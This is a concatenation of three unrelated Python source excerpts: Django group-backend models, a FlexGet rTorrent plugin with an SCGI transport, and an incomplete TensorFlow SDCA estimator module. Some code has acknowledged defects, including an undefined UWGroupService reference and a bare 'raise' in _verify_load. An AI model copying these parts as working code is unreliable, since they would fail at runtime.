        """Index backends by their source_type for get_backend_for_source()."""
        for backend in Crowd.get_crowd_backends():
            Crowd._source_types[backend.get_source_type()] = backend

    @staticmethod
    def get_backend_for_source(source_type):
        """Look up the backend class registered for source_type."""
        if source_type in Crowd._source_types:
            return Crowd._source_types[source_type]
        raise UnknownCrowdBackendException(source_type)

    class Meta:
        db_table = 'GroupWrapper'
        unique_together = ('source_key', 'source_type')
class UnknownCrowdBackendException(Exception):
    """Raised when no backend is registered for a given source_type."""
    pass
# Populate Crowd._source_types at import time so that
# Crowd.get_backend_for_source() works without any explicit setup call.
Crowd.register_source_types()
class CrowdOwner(models.Model):
    """Through table linking a Crowd to the People who own it."""
    id = models.AutoField(db_column='group_owner_id', primary_key=True)
    group = models.ForeignKey(Crowd, db_column='group_id')
    person = models.ForeignKey(Person, db_column='person_id', db_index=True)

    class Meta:
        db_table = 'GroupOwner'
        unique_together = ('group', 'person')
# This is supporting the solstice authz_implementation
class SolsticeCrowd(models.Model):
    """A group stored in Solstice's own Crowd tables."""
    id = models.AutoField(db_column='source_key', primary_key=True)
    creator = models.ForeignKey(Person, db_column='creator_id',
                                related_name='creator_person')
    application = models.CharField(max_length=255, db_column='application')
    is_visible = models.BooleanField(db_column='is_visible', default=False)
    name = models.CharField(max_length=255, db_column='name')
    description = models.TextField(db_column='description')
    date_created = models.DateTimeField(db_column='date_created')
    date_modified = models.DateTimeField(db_column='date_modified')
    member_string = models.CharField(max_length=255, db_column='member_str')
    owners = models.ManyToManyField(Person, through='SolsticeCrowdOwner',
                                    related_name='sol_crowd_owner')

    def json_data_structure(self):
        """JSON-serializable summary; dates use wsgiref's HTTP-date format."""
        return {
            'name': self.name,
            'description': self.description,
            'date_modified': format_date_time(time.mktime(
                self.date_modified.timetuple())),
            'date_created': format_date_time(time.mktime(
                self.date_created.timetuple())),
            'member_string': self.member_string,
        }

    def get_source_type(self):
        """Source type string identifying the Solstice backend."""
        return SolsticeCrowdImplementation.get_source_type()

    class Meta:
        db_table = 'Crowd'
class SolsticeCrowdMember(models.Model):
    """Membership row linking a Person to a SolsticeCrowd."""
    sol_crowd = models.ForeignKey(SolsticeCrowd, db_column='crowd_id',
                                  db_index=True)
    person = models.ForeignKey(Person, db_column='person_id', db_index=True)

    class Meta:
        db_table = 'PeopleInCrowd'
        unique_together = ('sol_crowd', 'person')
class SolsticeCrowdOwner(models.Model):
    """Ownership row linking a Person to a SolsticeCrowd."""
    id = models.AutoField(db_column='crowd_owner_id', primary_key=True)
    sol_crowd = models.ForeignKey(SolsticeCrowd, db_column='crowd_id')
    person = models.ForeignKey(Person, db_column='person_id', db_index=True)

    class Meta:
        db_table = 'CrowdOwner'
        unique_together = ('sol_crowd', 'person')
# This is supporting the uw_group_service authz_implementation
class GWSCrowd(models.Model):
    """A group mirrored from the UW Group Service (GWS)."""
    id = models.IntegerField(db_column='id')
    source_key = models.CharField(db_column='source_key', primary_key=True,
                                  max_length=255)
    name = models.CharField(max_length=255, db_column='name')
    description = models.TextField(db_column='description')
    date_created = models.DateTimeField(db_column='date_created')
    date_modified = models.DateTimeField(db_column='date_modified')
    date_reconciled = models.DateTimeField(db_column='date_reconciled')

    def json_data_structure(self):
        """JSON-serializable summary; dates use wsgiref's HTTP-date format."""
        return {
            'name': self.name,
            'description': self.description,
            'date_modified': format_date_time(time.mktime(
                self.date_modified.timetuple())),
            'date_created': format_date_time(time.mktime(
                self.date_created.timetuple())),
        }

    def get_source_type(self):
        # NOTE(review): UWGroupService is not imported anywhere in this
        # module, so calling this raises NameError as written -- confirm the
        # intended import (presumably the uw_group_service implementation).
        return UWGroupService.get_source_type()

    class Meta:
        db_table = 'GWSGroup'
class GWSCrowdOwner(models.Model):
    """Viewer/owner row linking a person id to a GWSCrowd."""
    id = models.AutoField(db_column='gws_viewers_id', primary_key=True)
    gws_crowd = models.ForeignKey(GWSCrowd, db_column='source_key')
    # Plain integer rather than a ForeignKey to Person -- presumably kept
    # loose so GWS rows can reference people not yet in the Person table;
    # TODO confirm.
    person_id = models.IntegerField(db_column='person_id', db_index=True)

    class Meta:
        db_table = 'GWSViewers'
        unique_together = ('gws_crowd', 'person_id')
|
|
import logging
import sys
import os
import socket
import re
import xmlrpclib
from time import sleep
from urlparse import urlparse
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget import plugin
from flexget.event import event
from flexget.entry import Entry
from flexget.config_schema import one_or_more
from flexget.utils.bittorrent import Torrent, is_torrent_file
log = logging.getLogger('rtorrent')
class SCGITransport(xmlrpclib.Transport):
    """ Used to override the default xmlrpclib transport to support SCGI """

    def request(self, host, handler, request_body, verbose=False):
        # SCGI has no keep-alive, so every request is a single shot.
        return self.single_request(host, handler, request_body, verbose)

    def single_request(self, host, handler, request_body, verbose=0):
        """Send one XML-RPC request over SCGI and return the parsed response.

        :param host: 'host:port' for TCP, or falsy to use a UNIX socket
        :param handler: UNIX socket path when host is falsy
        :param request_body: serialized XML-RPC payload
        """
        # Add SCGI headers to the request. SCGI frames the headers as a
        # netstring: '<length>:<NUL-separated key/value pairs>,<body>'.
        headers = [('CONTENT_LENGTH', str(len(request_body))), ('SCGI', '1')]
        header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00'
        header = '%d:%s' % (len(header), header)
        request_body = '%s,%s' % (header, request_body)

        sock = None
        try:
            if host:
                # TCP endpoint (e.g. scgi://localhost:5000)
                parsed_host = urlparse(host)
                host = parsed_host.hostname
                port = parsed_host.port
                addr_info = socket.getaddrinfo(host, int(port), socket.AF_INET, socket.SOCK_STREAM)
                sock = socket.socket(*addr_info[0][:3])
                sock.connect(addr_info[0][4])
            else:
                # UNIX domain socket; `handler` carries the filesystem path.
                sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                sock.connect(handler)

            self.verbose = verbose

            if sys.version_info[0] > 2:
                sock.send(bytes(request_body, 'utf-8'))
            else:
                sock.send(request_body)
            return self.parse_response(sock.makefile())
        finally:
            # Always release the socket, even when connect/send fails.
            if sock:
                sock.close()

    def parse_response(self, response):
        """Strip the SCGI response headers and feed the XML body to the parser."""
        p, u = self.getparser()

        # Accumulate chunks in a list and join once; repeated `str +=` is
        # quadratic in the worst case.
        chunks = []
        while True:
            data = response.read(1024)
            if not data:
                break
            chunks.append(data)
        response_body = ''.join(chunks)

        if self.verbose:
            # Bug fix: this was `log.info('body:', repr(...))`, which is an
            # invalid logging call -- the format string has no placeholder
            # for the second argument, so the body was never logged.
            log.info('body: %s', repr(response_body))

        # Remove SCGI headers from the response.
        response_header, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1)
        p.feed(response_body)
        p.close()

        return u.close()
class SCGIServerProxy(xmlrpclib.ServerProxy):
    """ Enable connection to SCGI proxy """

    def __init__(self, uri, transport=None, encoding=None, verbose=False, allow_none=False, use_datetime=False):
        # The double-underscore attributes are deliberately name-mangled
        # (to _SCGIServerProxy__*) so they cannot collide with remote
        # method names resolved through __getattr__.
        parsed_uri = urlparse(uri)
        self.uri = uri
        self.__host = uri
        self.__handler = parsed_uri.path
        if not self.__handler:
            # Default to the root path when the URI has no path component.
            self.__handler = '/'

        if not transport:
            transport = SCGITransport(use_datetime=use_datetime)
        self.__transport = transport

        self.__encoding = encoding
        self.__verbose = verbose
        self.__allow_none = allow_none

    def __close(self):
        # Exposed to callers via server('close') -- see __call__ below.
        self.__transport.close()

    def __request(self, method_name, params):
        # call a method on the remote server
        request = xmlrpclib.dumps(params, method_name, encoding=self.__encoding, allow_none=self.__allow_none)

        response = self.__transport.request(self.uri, self.__handler, request, verbose=self.__verbose)

        # Single-value responses are unwrapped for convenience.
        if len(response) == 1:
            response = response[0]

        return response

    def __repr__(self):
        return '<SCGIServerProxy for %s%s>' % (self.__host, self.__handler)

    def __getattr__(self, name):
        # magic method dispatcher: any attribute access becomes a bound
        # remote method that routes through __request.
        return xmlrpclib._Method(self.__request, name)

    # note: to call a remote object with an non-standard name, use
    # result getattr(server, "strange-python-name")(args)

    def __call__(self, attr):
        """
        A workaround to get special attributes on the ServerProxy
        without interfering with the magic __getattr__
        """
        if attr == 'close':
            return self.__close
        elif attr == 'transport':
            return self.__transport
        raise AttributeError('Attribute %r not found' % (attr,))
class RTorrent(object):
    """ rTorrent API client """

    # NOTE(review): 'down.rate' appears here in addition to 'down_rate'
    # (which _clean_fields converts to 'down.rate'), so the download rate
    # is requested twice per call -- confirm whether that is intentional.
    default_fields = [
        'hash',
        'name',
        'up_total', 'down_total', 'down_rate',
        'is_open', 'is_active',
        'custom1', 'custom2', 'custom3', 'custom4', 'custom5',
        'state', 'complete',
        'bytes_done', 'down.rate', 'left_bytes',
        'ratio',
        'base_path',
    ]

    # Fields every entry needs; always fetched even if not requested.
    required_fields = [
        'hash',
        'name',
        'base_path'
    ]

    def __init__(self, uri, username=None, password=None):
        """
        New connection to rTorrent

        :param uri: RTorrent URL. Supports both http(s) and scgi
        :param username: Username for basic auth over http(s)
        :param password: Password for basic auth over http(s)
        """
        self.uri = uri
        self.username = username
        self.password = password
        self._version = None

        parsed_uri = urlparse(uri)

        # Reformat uri with username and password for HTTP(s) Auth
        if self.username and self.password:
            if parsed_uri.scheme not in ['http', 'https']:
                raise IOError('Username and password only supported on http(s)')

            data = {
                'scheme': parsed_uri.scheme,
                'hostname': parsed_uri.hostname,
                'port': parsed_uri.port,
                'path': parsed_uri.path,
                'query': parsed_uri.query,
                'username': self.username,
                'password': self.password,
            }
            self.uri = '%(scheme)s://%(username)s:%(password)s@%(hostname)s%(path)s%(query)s' % data

        # Determine the proxy server
        if parsed_uri.scheme in ['http', 'https']:
            sp = xmlrpclib.ServerProxy
        elif parsed_uri.scheme == 'scgi':
            sp = SCGIServerProxy
        else:
            raise IOError('Unsupported scheme %s for uri %s' % (parsed_uri.scheme, self.uri))

        self._server = sp(self.uri)

    def _clean_fields(self, fields, reverse=False):
        """Translate field names between Flexget style ('up_total') and the
        rTorrent XML-RPC style ('up.total').

        Bug fix: operates on a copy of the input. The previous version
        rewrote the caller's list in place, which silently corrupted the
        class-level ``default_fields`` the first time it was used as the
        default argument.

        :param fields: list of field names, or falsy to use the defaults
        :param reverse: convert rTorrent style back to Flexget style
        """
        fields = list(fields) if fields else list(self.default_fields)

        if reverse:
            for field in ['up.total', 'down.total', 'down.rate']:
                if field in fields:
                    fields[fields.index(field)] = field.replace('.', '_')
            return fields

        # Always fetch the fields needed to build entries.
        for required_field in self.required_fields:
            if required_field not in fields:
                fields.insert(0, required_field)

        for field in ['up_total', 'down_total', 'down_rate']:
            if field in fields:
                fields[fields.index(field)] = field.replace('_', '.')

        return fields

    @property
    def version(self):
        """rTorrent client version as a list of ints, e.g. [0, 9, 6]."""
        return [int(v) for v in self._server.system.client_version().split('.')]

    def load(self, raw_torrent, fields=None, start=False, mkdir=True):
        """Load a raw (bencoded) torrent into rTorrent.

        :param raw_torrent: bencoded torrent data
        :param fields: optional dict of d.<key>.set values applied on load
            (bug fix: the default was a shared mutable dict)
        :param start: start the torrent immediately after loading
        :param mkdir: create the target directory first if one is given
        """
        if fields is None:
            fields = {}
        # First param is empty 'target'
        params = ['', xmlrpclib.Binary(raw_torrent)]

        # Additional fields to set
        for key, val in fields.iteritems():
            # Values must be escaped if within params
            params.append('d.%s.set=%s' % (key, re.escape(str(val))))

        if mkdir and 'directory' in fields:
            result = self._server.execute.throw('', 'mkdir', '-p', fields['directory'])
            if result != 0:
                raise xmlrpclib.Error('Failed creating directory %s' % fields['directory'])

        # Call load method and return the response
        if start:
            return self._server.load.raw_start(*params)
        else:
            return self._server.load.raw(*params)

    def torrent(self, info_hash, fields=None):
        """ Get the details of a torrent """
        fields = self._clean_fields(fields)

        multi_call = xmlrpclib.MultiCall(self._server)

        for field in fields:
            method_name = 'd.%s' % field
            getattr(multi_call, method_name)(info_hash)

        resp = multi_call()
        # TODO: Maybe we should return a named tuple or a Torrent class?
        return dict(zip(self._clean_fields(fields, reverse=True), [val for val in resp]))

    def torrents(self, view='main', fields=None):
        """List all torrents in the given view, one dict per torrent."""
        fields = self._clean_fields(fields)

        params = ['d.%s=' % field for field in fields]
        params.insert(0, view)

        resp = self._server.d.multicall(params)

        # Response is formatted as a list of lists, with just the values
        return [dict(zip(self._clean_fields(fields, reverse=True), val)) for val in resp]

    def update(self, info_hash, fields):
        """Set d.<key> properties on an existing torrent."""
        multi_call = xmlrpclib.MultiCall(self._server)

        for key, val in fields.iteritems():
            method_name = 'd.%s.set' % key
            getattr(multi_call, method_name)(info_hash, str(val))

        return multi_call()[0]

    def delete(self, info_hash):
        """Remove the torrent from the client."""
        return self._server.d.erase(info_hash)

    def stop(self, info_hash):
        """Stop and close the torrent."""
        self._server.d.stop(info_hash)
        return self._server.d.close(info_hash)

    def start(self, info_hash):
        """(Re)start the torrent."""
        return self._server.d.start(info_hash)

    def move(self, info_hash, dst_path):
        """Move a torrent's data to dst_path and update its directory."""
        self.stop(info_hash)

        torrent = self.torrent(info_hash, fields=['base_path'])

        try:
            log.verbose('Creating destination directory `%s`' % dst_path)
            self._server.execute.throw('', 'mkdir', '-p', dst_path)
        except xmlrpclib.Error:
            raise xmlrpclib.Error("unable to create folder %s" % dst_path)

        self._server.execute.throw('', 'mv', '-u', torrent['base_path'], dst_path)
        self._server.d.set_directory(info_hash, dst_path)
        self.start(info_hash)
class RTorrentPluginBase(object):
    """Behavior shared by the rTorrent input and output plugins."""

    priority_map = {
        'high': 3,
        'medium': 2,
        'low': 1,
        'off': 0,
    }

    def _build_options(self, config, entry, entry_first=True):
        """Collect rTorrent download options from the entry and the config.

        For each supported option both the entry value and the config value
        are consulted; ``entry_first`` decides which source wins when both
        are set (they are never merged). The winner is rendered through the
        entry's template engine. 'path' is mapped to rTorrent's 'directory'
        and scrubbed of unsafe characters.
        """
        options = {}

        for opt_key in ('path', 'message', 'priority',
                        'custom1', 'custom2', 'custom3', 'custom4', 'custom5'):
            # Values do not merge config with task
            # Task takes priority then config is used
            candidates = (entry.get(opt_key), config.get(opt_key))
            if not entry_first:
                candidates = tuple(reversed(candidates))
            chosen = candidates[0] or candidates[1]
            if chosen:
                options[opt_key] = entry.render(chosen)

        # Convert priority from string to int
        if options.get('priority') in self.priority_map:
            options['priority'] = self.priority_map[options['priority']]

        # Map Flexget path to directory in rTorrent
        if options.get('path'):
            options['directory'] = pathscrub(options.pop('path'))

        return options

    def on_task_start(self, task, config):
        """Abort the task early if rTorrent is unreachable or too old."""
        try:
            client = RTorrent(config['uri'], username=config.get('username'),
                              password=config.get('password'))
            if client.version < [0, 9, 4]:
                task.abort('rtorrent version >=0.9.4 required, found {0}'.format(
                    '.'.join(map(str, client.version))))
        except (IOError, xmlrpclib.Error) as e:
            raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e))
class RTorrentOutputPlugin(RTorrentPluginBase):
    """Task output plugin: add, update or delete torrents in rTorrent."""

    schema = {
        'type': 'object',
        'properties': {
            # connection info
            'uri': {'type': 'string'},
            'username': {'type': 'string'},
            'password': {'type': 'string'},
            'start': {'type': 'boolean', 'default': True},
            'mkdir': {'type': 'boolean', 'default': True},
            # Bug fix: the keyword was misspelled 'emun', so invalid action
            # values were silently accepted by the schema.
            'action': {'type': 'string', 'enum': ['update', 'delete', 'add'], 'default': 'add'},
            # properties to set on rtorrent download object
            'message': {'type': 'string'},
            'priority': {'type': 'string'},
            'path': {'type': 'string'},
            'custom1': {'type': 'string'},
            'custom2': {'type': 'string'},
            'custom3': {'type': 'string'},
            'custom4': {'type': 'string'},
            'custom5': {'type': 'string'},
        },
        'required': ['uri'],
        'additionalProperties': False,
    }

    def _verify_load(self, client, info_hash):
        """Poll rTorrent until the freshly loaded torrent is queryable.

        Retries up to 5 times, 0.5s apart; re-raises the last error if the
        torrent never shows up.
        """
        for i in range(0, 5):
            try:
                return client.torrent(info_hash, fields=['hash'])
            except (IOError, xmlrpclib.Error):
                sleep(0.5)
        raise

    def on_task_download(self, task, config):
        """Ensure temp .torrent files exist before the output phase runs."""
        # If the download plugin is not enabled, we need to call it to get
        # our temp .torrent files
        if config['action'] == 'add' and 'download' not in task.config:
            download = plugin.get_plugin_by_name('download')
            download.instance.get_temp_files(task, handle_magnets=True, fail_html=True)

    def on_task_output(self, task, config):
        """Dispatch each accepted entry to add/update/delete."""
        client = RTorrent(config['uri'], username=config.get('username'), password=config.get('password'))

        for entry in task.accepted:
            if task.options.test:
                log.info('Would add %s to rTorrent' % entry['url'])
                continue

            if config['action'] == 'add':
                try:
                    options = self._build_options(config, entry)
                except RenderError as e:
                    entry.fail("failed to render properties %s" % str(e))
                    continue
                self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir'])

            # update/delete need an already-known info hash
            info_hash = entry.get('torrent_info_hash')
            if not info_hash:
                entry.fail('Failed to %s as no info_hash found' % config['action'])
                continue

            if config['action'] == 'delete':
                self.delete_entry(client, entry)

            if config['action'] == 'update':
                self.update_entry(client, entry, config)

    def delete_entry(self, client, entry):
        """Remove the torrent identified by the entry's info hash."""
        try:
            client.delete(entry['torrent_info_hash'])
            log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash']))
        except (IOError, xmlrpclib.Error) as e:
            entry.fail('Failed to delete: %s' % str(e))
            return

    def update_entry(self, client, entry, config):
        """Update torrent properties, moving data when the path changed."""
        info_hash = entry['torrent_info_hash']

        # First check if it already exists
        try:
            existing = client.torrent(info_hash, fields=['base_path'])
        except IOError as e:
            entry.fail("Error updating torrent %s" % str(e))
            return
        except xmlrpclib.Error:
            # Torrent not loaded yet; path changes are skipped below.
            existing = False

        # Build options but make config values override entry values
        try:
            options = self._build_options(config, entry, entry_first=False)
        except RenderError as e:
            entry.fail("failed to render properties %s" % str(e))
            return

        if existing and 'directory' in options:
            # Check if changing to another directory which requires a move
            if options['directory'] != existing['base_path'] \
                    and options['directory'] != os.path.dirname(existing['base_path']):
                try:
                    log.verbose("Path is changing, moving files from '%s' to '%s'"
                                % (existing['base_path'], options['directory']))
                    client.move(info_hash, options['directory'])
                except (IOError, xmlrpclib.Error) as e:
                    entry.fail('Failed moving torrent: %s' % str(e))
                    return

        # Remove directory from update otherwise rTorrent will append the title to the directory path
        if 'directory' in options:
            del options['directory']

        try:
            client.update(info_hash, options)
            log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash))
        except (IOError, xmlrpclib.Error) as e:
            entry.fail('Failed to update: %s' % str(e))
            return

    def add_entry(self, client, entry, options, start=True, mkdir=False):
        """Load a torrent (file or magnet) into rTorrent and verify it took."""
        if 'torrent_info_hash' not in entry:
            entry.fail('missing torrent_info_hash')
            return

        if entry['url'].startswith('magnet:'):
            # rTorrent accepts a magnet link wrapped in a minimal bencoded dict.
            torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url'])
        else:
            # Check that file is downloaded
            if 'file' not in entry:
                entry.fail('file missing?')
                return

            # Verify the temp file exists
            if not os.path.exists(entry['file']):
                entry.fail("Downloaded temp file '%s' doesn't exist!?" % entry['file'])
                return

            # Verify valid torrent file
            if not is_torrent_file(entry['file']):
                entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file'])
                return

            try:
                with open(entry['file'], 'rb') as f:
                    torrent_raw = f.read()
            except IOError as e:
                entry.fail('Failed to add to rTorrent %s' % str(e))
                return

            try:
                Torrent(torrent_raw)
            except SyntaxError as e:
                entry.fail('Strange, unable to decode torrent, raise a BUG: %s' % str(e))
                return

        # First check if it already exists
        try:
            if client.torrent(entry['torrent_info_hash']):
                log.warning("Torrent %s already exists, won't add" % entry['title'])
                return
        except IOError as e:
            entry.fail("Error checking if torrent already exists %s" % str(e))
        except xmlrpclib.Error:
            # No existing found
            pass

        try:
            resp = client.load(torrent_raw, fields=options, start=start, mkdir=mkdir)
            if resp != 0:
                entry.fail('Failed to add to rTorrent invalid return value %s' % resp)
        except (IOError, xmlrpclib.Error) as e:
            entry.fail('Failed to add to rTorrent %s' % str(e))
            return

        # Verify the torrent loaded
        try:
            self._verify_load(client, entry['torrent_info_hash'])
            log.info('%s added to rtorrent' % entry['title'])
        except (IOError, xmlrpclib.Error) as e:
            entry.fail('Failed to verify torrent loaded: %s' % str(e))

    def on_task_exit(self, task, config):
        """ Make sure all temp files are cleaned up when task exists """
        # If download plugin is enabled, it will handle cleanup.
        if 'download' not in task.config:
            download = plugin.get_plugin_by_name('download')
            download.instance.cleanup_temp_files(task)

    on_task_abort = on_task_exit
class RTorrentInputPlugin(RTorrentPluginBase):
    """Task input plugin: create entries from torrents known to rTorrent."""

    schema = {
        'type': 'object',
        'properties': {
            'uri': {'type': 'string'},
            'username': {'type': 'string'},
            'password': {'type': 'string'},
            'view': {'type': 'string', 'default': 'main'},
            'fields': one_or_more({'type': 'string', 'enum': RTorrent.default_fields}),
        },
        'required': ['uri'],
        'additionalProperties': False
    }

    def on_task_input(self, task, config):
        """Query the configured rTorrent view and emit one entry per torrent."""
        client = RTorrent(config['uri'], username=config.get('username'), password=config.get('password'))

        fields = config.get('fields')

        try:
            torrents = client.torrents(config['view'], fields=fields)
        except (IOError, xmlrpclib.Error) as e:
            task.abort('Could not get torrents (%s): %s' % (config['view'], e))
            return

        entries = []

        for torrent in torrents:
            entry = Entry(
                title=torrent['name'],
                url='%s/%s' % (config['uri'], torrent['hash']),
                path=torrent['base_path'],
                torrent_info_hash=torrent['hash'],
            )
            # Expose every fetched field on the entry as well.
            for attr, value in torrent.iteritems():
                entry[attr] = value

            entries.append(entry)

        return entries
@event('plugin.register')
def register_plugin():
    """Register the output ('rtorrent') and input ('from_rtorrent') plugins."""
    plugin.register(RTorrentOutputPlugin, 'rtorrent', api_ver=2)
    plugin.register(RTorrentInputPlugin, 'from_rtorrent', api_ver=2)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.training import training_util
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.linear_optimizer.python import sdca_optimizer
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import session_run_hook
def _head_is_valid_for_sdca(head):
  """Returns true if the provided head is supported by SDCAOptimizer."""
  # pylint: disable=protected-access
  # isinstance accepts a tuple of types, replacing the original chain of
  # three separate isinstance checks.
  return isinstance(head, (head_lib._BinaryLogisticHead,
                           head_lib._BinarySvmHead,
                           head_lib._RegressionHead))
# pylint: enable=protected-access
def _add_bias_column(feature_columns, columns_to_tensors, bias_variable,
                     columns_to_variables):
  """Adds a fake bias feature column filled with all 1s.

  Args:
    feature_columns: An iterable of the model's feature columns.
    columns_to_tensors: Dict mapping feature columns to input tensors; the
      bias column's all-ones tensor is added to it in place.
    bias_variable: Variable holding the bias weights.
    columns_to_variables: Dict mapping feature columns to weight variables;
      the bias column's variable list is added to it in place.

  Raises:
    ValueError: If the reserved bias column name is already taken, if
      feature_columns is empty, or if the batch size cannot be inferred.
  """
  # TODO(b/31008490): Move definition to a common constants place.
  bias_column_name = "tf_virtual_bias_column"
  # Bug fix: compare names with ==, not `is`. Identity comparison of strings
  # only worked when both sides happened to be interned.
  if any(col.name == bias_column_name for col in feature_columns):
    raise ValueError("%s is a reserved column name." % bias_column_name)
  if not feature_columns:
    raise ValueError("feature_columns can't be empty.")

  # Loop through input tensors until we can figure out batch_size.
  batch_size = None
  for column in columns_to_tensors.values():
    if isinstance(column, tuple):
      column = column[0]
    if isinstance(column, sparse_tensor.SparseTensor):
      shape = tensor_util.constant_value(column.dense_shape)
      if shape is not None:
        batch_size = shape[0]
        break
    else:
      batch_size = array_ops.shape(column)[0]
      break
  if batch_size is None:
    raise ValueError("Could not infer batch size from input features.")

  bias_column = layers.real_valued_column(bias_column_name)
  columns_to_tensors[bias_column] = array_ops.ones(
      [batch_size, 1], dtype=dtypes.float32)
  columns_to_variables[bias_column] = [bias_variable]
def sdca_model_fn(features, labels, mode, params, config=None):
  """A model_fn for linear models that use the SDCA optimizer.

  Args:
    features: A dict of `Tensor` keyed by column name.
    labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
      dtype `int32` or `int64` with values in the set {0, 1}.
    mode: Defines whether this is training, evaluation or prediction.
      See `ModeKeys`.
    params: A dict of hyperparameters.
      The following hyperparameters are expected:
      * head: A `Head` instance. Type must be one of `_BinarySvmHead`,
          `_RegressionHead` or `_BinaryLogisticHead`.
      * feature_columns: An iterable containing all the feature columns used by
          the model.
      * l1_regularization: Global (across all examples) L1-regularization
          parameter.
      * l2_regularization: Global (across all examples) L2-regularization
          parameter.
      * num_loss_partitions: Number of partitions of the global loss function
          optimized by `SDCAOptimizer`.
      * weight_column_name: A string defining the weight feature column, or
          None if there are no weights.
      * update_weights_hook: A `SessionRunHook` object or None. Used to update
          model weights.
    config: `RunConfig` object to configure the runtime settings.

  Returns:
    A `ModelFnOps` instance.

  Raises:
    ValueError: If the type of head is not one of `_BinarySvmHead`,
      `_RegressionHead` or `_MultiClassHead`.
    ValueError: If mode is not any of the `ModeKeys`.
  """
  head = params["head"]
  feature_columns = params["feature_columns"]
  example_id_column = params["example_id_column"]
  l1_regularization = params["l1_regularization"]
  l2_regularization = params["l2_regularization"]
  num_loss_partitions = params["num_loss_partitions"]
  weight_column_name = params["weight_column_name"]
  update_weights_hook = params.get("update_weights_hook", None)

  # Map the head type onto the loss SDCA knows how to optimize.
  loss_type = None
  if isinstance(head, head_lib._BinarySvmHead):  # pylint: disable=protected-access
    loss_type = "hinge_loss"
  elif isinstance(head, head_lib._BinaryLogisticHead):  # pylint: disable=protected-access
    loss_type = "logistic_loss"
  elif isinstance(head, head_lib._RegressionHead):  # pylint: disable=protected-access
    loss_type = "squared_loss"
  else:
    raise ValueError("Unsupported head type: {}".format(type(head)))

  assert head.logits_dimension == 1, (
      "SDCA only applies to logits_dimension=1.")

  # Update num_loss_partitions based on number of workers.
  n_loss_partitions = num_loss_partitions or max(1, config.num_worker_replicas)
  optimizer = sdca_optimizer.SDCAOptimizer(
      example_id_column=example_id_column,
      num_loss_partitions=n_loss_partitions,
      symmetric_l1_regularization=l1_regularization,
      symmetric_l2_regularization=l2_regularization)

  parent_scope = "linear"

  with variable_scope.variable_scope(
      values=features.values(), name_or_scope=parent_scope) as scope:
    # Copy before mutating so the caller's dict is left untouched.
    features = features.copy()
    features.update(layers.transform_features(features, feature_columns))
    logits, columns_to_variables, bias = (
        layers.weighted_sum_from_feature_columns(
            columns_to_tensors=features,
            feature_columns=feature_columns,
            num_outputs=1,
            scope=scope))

    _add_bias_column(feature_columns, features, bias, columns_to_variables)

  def _train_op_fn(unused_loss):
    # SDCA computes its own loss internally; the head-provided loss is
    # ignored (hence unused_loss).
    global_step = training_util.get_global_step()
    sdca_model, train_op = optimizer.get_train_step(
        columns_to_variables, weight_column_name, loss_type, features, labels,
        global_step)
    if update_weights_hook is not None:
      # Hand the hook the pieces it needs to build the update op in begin().
      update_weights_hook.set_parameters(sdca_model, train_op)
    return train_op

  model_fn_ops = head.create_model_fn_ops(
      features=features,
      labels=labels,
      mode=mode,
      train_op_fn=_train_op_fn,
      logits=logits)
  if update_weights_hook is not None:
    # Run the weight-update hook on the chief alongside training.
    return model_fn_ops._replace(training_chief_hooks=(
        model_fn_ops.training_chief_hooks + [update_weights_hook]))
  return model_fn_ops
class _SdcaUpdateWeightsHook(session_run_hook.SessionRunHook):
  """SessionRunHook to update and shrink SDCA model weights.

  Wired up lazily: `sdca_model_fn` calls `set_parameters()` once the SDCA
  train op has been built, then `begin()` constructs the weight-update op
  in the default graph, and `before_run()` schedules it on every step.
  """
  def __init__(self):
    # Intentionally empty: the model and train op are not known yet.
    # They are injected later via set_parameters() from sdca_model_fn.
    pass
  def set_parameters(self, sdca_model, train_op):
    # Stash the SDCA model and its train op so begin() can build the
    # weight-update op after the graph is fully constructed.
    self._sdca_model = sdca_model
    self._train_op = train_op
  def begin(self):
    """Construct the update_weights op.
    The op is implicitly added to the default graph.
    """
    self._update_op = self._sdca_model.update_weights(self._train_op)
  def before_run(self, run_context):
    """Return the update_weights op so that it is executed during this run."""
    return session_run_hook.SessionRunArgs(self._update_op)
class _SDCAEstimator(estimator.Estimator):
  """Base estimator class for linear models using the SDCA optimizer.

  Not meant to be instantiated directly; use one of the concrete
  subclasses (e.g. `SDCALogisticClassifier`, `SDCALinearRegressor`).
  """

  def __init__(self,
               example_id_column,
               feature_columns,
               weight_column_name=None,
               model_dir=None,
               head=None,
               l1_regularization=0.0,
               l2_regularization=1.0,
               num_loss_partitions=None,
               config=None,
               feature_engineering_fn=None):
    """Construct a `_SDCAEstimator` estimator object.

    Args:
      example_id_column: String name of the feature column holding example
        ids; used to initialize the underlying SDCA optimizer.
      feature_columns: Non-empty iterable of `FeatureColumn`-derived items
        used by the model.
      weight_column_name: Optional string name of the feature column holding
        per-example weights (multiplied into each example's loss).
      model_dir: Directory to save/restore model parameters, graph, etc.
      head: Model head; must be accepted by `_head_is_valid_for_sdca` and
        have `logits_dimension == 1`.
